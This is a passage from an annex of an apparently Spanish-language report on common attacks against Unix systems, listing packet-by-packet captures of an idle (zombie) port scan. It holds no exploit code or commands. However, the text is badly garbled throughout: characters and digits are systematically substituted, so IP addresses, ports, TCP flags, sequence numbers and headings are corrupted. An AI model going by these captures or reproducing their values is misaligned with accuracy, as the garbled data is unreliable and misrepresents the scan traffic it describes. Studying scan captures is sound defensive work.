- Tiempo: 0.03(36+ 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.(:357(5 Proto!o"o: T,P De !rip!i%n: (0 > 357(5 -$.T4 #,50 .eq10 #!610 &in10 2en10

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *15 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete Nro: ) - Tiempo: 1.151695 8P Origen: 19(.16).0.(:357(6 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 357(6 > (( -B8N4 P.?4 K$H0 .eq10 Krg10 2en10

B.2.0. Ca"tura 0 a **% 7dle ,can
Paquete nro. 1 - Tiempo 0.000000 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: ** -> ** 8P ?ea7er: =er ion:** 2en:** 8D:** Brag:** TT2:** 9...: T,P ?ea7er: .Port:** DPort:** .eqN:** #!6N:** B"ag :0D**9**: &n7:** 9...: De !rip!ion: <t'er ; #$P >'o 'a 19(.16).0.100 aE 19(.16).0.( Paquete nro. ( - Tiempo 0.00()90 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: ** -> ** 8P ?ea7er: =er ion:** 2en:** 8D:** Brag:** TT2:** 9...: T,P ?ea7er: .Port:** DPort:** .eqN:** #!6N:** B"ag :0D**9**: &n7:** 9...: De !rip!ion: <t'er ; #$P i at 00:0!:(9:90:(a:(7 aE 19(.16).0.100 Paquete nro. 3 - Tiempo 0.0(9939 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:7))( Brag:02 TT2:37 9...: T,P ?ea7er: .Port:+617+ DPort:)0 .eqN:13(0+0++1 #!6N:(303113(51 B"ag :0D1(9.#: &n7:(0+) 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+617+ > 19(.16).0.30:>>> .# Paquete nro. + - Tiempo 0.03193( 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)1 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+617+ .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+617+ $ Paquete nro. 5 - Tiempo 0.065571 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:3))03 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6175 DPort:)0 .eqN:13(0+0++( #!6N:(303113(51 B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6175 > 19(.16).0.30:>>> .# Paquete nro. 6 - Tiempo 0.065)0+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)( Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6175 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6175 $ Paquete nro. 7 - Tiempo 0.097500 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(0931 Brag:02 TT2:+3 9...: T,P ?ea7er: .Port:+6176 DPort:)0 .eqN:13(0+0++3 #!6N:(303113(51 B"ag :0D1(9.#: &n7:+096 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6176 > 19(.16).0.30:>>> .# Paquete nro. ) - Tiempo 0.0977+) 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)3 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6176 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6176 $ Paquete nro. 9 - Tiempo 0.1(9+9( 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:3)11) Brag:02 TT2:56 9...:

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *1J de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
T,P ?ea7er: .Port:+6177 DPort:)0 .eqN:13(0+0+++ #!6N:(303113(51 B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6177 > 19(.16).0.30:>>> .# Paquete nro. 10 - Tiempo 0.1(9905 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)+ Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6177 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6177 $ Paquete nro. 11 - Tiempo 0.161565 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:3(+51 Brag:02 TT2:+6 9...: T,P ?ea7er: .Port:+617) DPort:)0 .eqN:13(0+0++5 #!6N:(303113(51 B"ag :0D1(9.#: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+617) > 19(.16).0.30:>>> .# Paquete nro. 1( - Tiempo 0.16195) 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)5 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+617) .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+617) $ Paquete nro. 13 - Tiempo 0.193+66 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:59060 Brag:02 TT2:+1 9...: T,P ?ea7er: .Port:+6179 DPort:)0 .eqN:13(0+0++6 #!6N:(303113(51 B"ag :0D1(9.#: &n7:(0+) 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6179 > 19(.16).0.30:>>> .# Paquete nro. 1+ - Tiempo 0.19+(95 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)6 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6179 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6179 $ Paquete nro. 15 - Tiempo 0.19++50 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:1+395 Brag:02 TT2:5( 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:13(0+0++1 #!6N:(303113(51 B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100:+6173 > 19(.16).0.30:>>> .# Paquete nro. 16 - Tiempo 0.19+6(0 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)7 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. 17 - Tiempo 0.19+6(7 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)7 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. 1) - Tiempo 0.(+5560 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:+7)16 Brag:02 TT2:50 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:13(0+0++( #!6N:(303113(51 B"ag :0D1(9.#: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100:+6173 > 19(.16).0.30:>>> .# Paquete nro. 19 - Tiempo 0.(+607( 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *1+ de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)) Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (0 - Tiempo 0.(+60)0 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)) Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (1 - Tiempo 0.(97577 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:6(317 Brag:02 TT2:5+ 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:13(0+0++3 #!6N:(303113(51 B"ag :0D1(9.#: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100:+6173 > 19(.16).0.30:>>> .# Paquete nro. (( - Tiempo 0.(97757 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)9 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (3 - Tiempo 0.(9776+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)9 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (+ - Tiempo 0.3+966( 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:37))+ Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:13(0+0+++ #!6N:(303113(51 B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100:+6173 > 19(.16).0.30:>>> .# Paquete nro. (5 - Tiempo 0.3+9)59 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:90 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (6 - Tiempo 0.3+9)66 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:90 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (7 - Tiempo 0.653+67 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:+6(96 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6330 DPort:)0 .eqN:()70071(9( #!6N:397)13361+ B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6330 > 19(.16).0.30:>>> .# Paquete nro. () - Tiempo 0.653739 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:91 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6330 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6330 $ Paquete nro. (9 - Tiempo 0.653)51 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:90:(a:(7

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *1O de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:335(0 Brag:02 TT2:5( 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(30079163) #!6N:0 B"ag :0D0(9.: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp . Paquete nro. 30 - Tiempo 0.65+0+9 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(5 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:(5 DPort:)0 .eqN:(1599+6)01 #!6N:(300791639 B"ag :0D1(9.#: &n7:30660 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: mtp > 19(.16).0.30:>>> .# Paquete nro. 31 - Tiempo 0.65+055 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(5 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:(5 DPort:)0 .eqN:(1599+6)01 #!6N:(300791639 B"ag :0D1(9.#: &n7:30660 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: mtp > 19(.16).0.30:>>> .# Paquete nro. 3( - Tiempo 0.65+33+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:9( Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(300791639 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp $ Paquete nro. 33 - Tiempo 0.65+3+1 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:9( Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(300791639 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp $ Paquete nro. 3+ - Tiempo 0.705565 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:15757 Brag:02 TT2:59 9...: T,P ?ea7er: .Port:+6(+) DPort:)0 .eqN:()7007179( #!6N:397)13361+ B"ag :0D1(9.#: &n7:+096 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6(+) > 19(.16).0.30:>>> .# Paquete nro. 35 - Tiempo 0.705)51 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:93 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6(+) .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6(+) $ Paquete nro. 36 - Tiempo 0.7059+) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:15305 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:)0 DPort:(( .eqN:(30079163) #!6N:0 B"ag :0D0(9.: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: ' . Paquete nro. 37 - Tiempo 0.7060)7 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:+0 8D:(6 Brag:02 TT2:(55 9...: T,P ?ea7er: .Port:(( DPort:)0 .eqN:0 #!6N:(300791639 B"ag :0D1+9$#: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: ' > 19(.16).0.30:>>> $# Paquete nro. 3) - Tiempo 0.706093 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:+0 8D:(6 Brag:02 TT2:(55 9...: T,P ?ea7er: .Port:(( DPort:)0 .eqN:0 #!6N:(300791639 B"ag :0D1+9$#: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: ' > 19(.16).0.30:>>> $# Paquete nro. 39 - Tiempo 0.757+75 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *10 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:13500 Brag:02 TT2:56 9...: T,P ?ea7er: .Port:+6376 DPort:)0 .eqN:()7007((9( #!6N:397)13361+ B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6376 > 19(.16).0.30:>>> .# Paquete nro. +0 - Tiempo 0.757751 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:9+ Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6376 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6376 $ Paquete nro. +1 - Tiempo 0.7)1+31 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:1+56) Brag:02 TT2:+( 9...: T,P ?ea7er: .Port:+6391 DPort:)0 .eqN:()7007(79( #!6N:397)13361+ B"ag :0D1(9.#: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6391 > 19(.16).0.30:>>> .# Paquete nro. +( - Tiempo 0.7)1696 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:95 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6391 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6391 $ Paquete nro. +3 - Tiempo 0.7)1)0( 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:606+ Brag:02 TT2:+( 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(30079163) #!6N:0 B"ag :0D0(9.: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp . Paquete nro. ++ - Tiempo 0.7)1935 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(7 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:(5 DPort:)0 .eqN:(16016+(03 #!6N:(300791639 B"ag :0D1(9.#: &n7:30660 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: mtp > 19(.16).0.30:>>> .# Paquete nro. +5 - Tiempo 0.7)19+0 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(7 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:(5 DPort:)0 .eqN:(16016+(03 #!6N:(300791639 B"ag :0D1(9.#: &n7:30660 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: mtp > 19(.16).0.30:>>> .# Paquete nro. +6 - Tiempo 0.7)(1+6 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:96 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(300791639 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp $ Paquete nro. +7 - Tiempo 0.7)(15( 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:96 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(300791639 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp $ Paquete nro. +) - Tiempo 0.)33+53 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(315( Brag:02 TT2:+( 9...: T,P ?ea7er: .Port:+6176 DPort:)0 .eqN:()70073(9( #!6N:397)13361+ B"ag :0D1(9.#: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6176 > 19(.16).0.30:>>> .#

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *5. de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete nro. +9 - Tiempo 0.)33790 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:97 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6176 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6176 $ Paquete nro. 50 - Tiempo 0.)33)9) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:+(507 Brag:02 TT2:50 9...: T,P ?ea7er: .Port:)0 DPort:(( .eqN:(30079163) #!6N:0 B"ag :0D0(9.: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: ' . Paquete nro. 51 - Tiempo 0.)3+100 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:+0 8D:() Brag:02 TT2:(55 9...: T,P ?ea7er: .Port:(( DPort:)0 .eqN:0 #!6N:(300791639 B"ag :0D1+9$#: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: ' > 19(.16).0.30:>>> $# Paquete nro. 5( - Tiempo 0.)3+106 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:+0 8D:() Brag:02 TT2:(55 9...: T,P ?ea7er: .Port:(( DPort:)0 .eqN:0 #!6N:(300791639 B"ag :0D1+9$#: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: ' > 19(.16).0.30:>>> $# Paquete nro. 53 - Tiempo 0.))5+57 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:61533 Brag:02 TT2:+1 9...: T,P ?ea7er: .Port:+6(66 DPort:)0 .eqN:()7007379( #!6N:397)13361+ B"ag :0D1(9.#: &n7:(0+) 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6(66 > 19(.16).0.30:>>> .# Paquete nro. 5+ - Tiempo 0.))56)+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:9) Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6(66 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6(66 $ Paquete 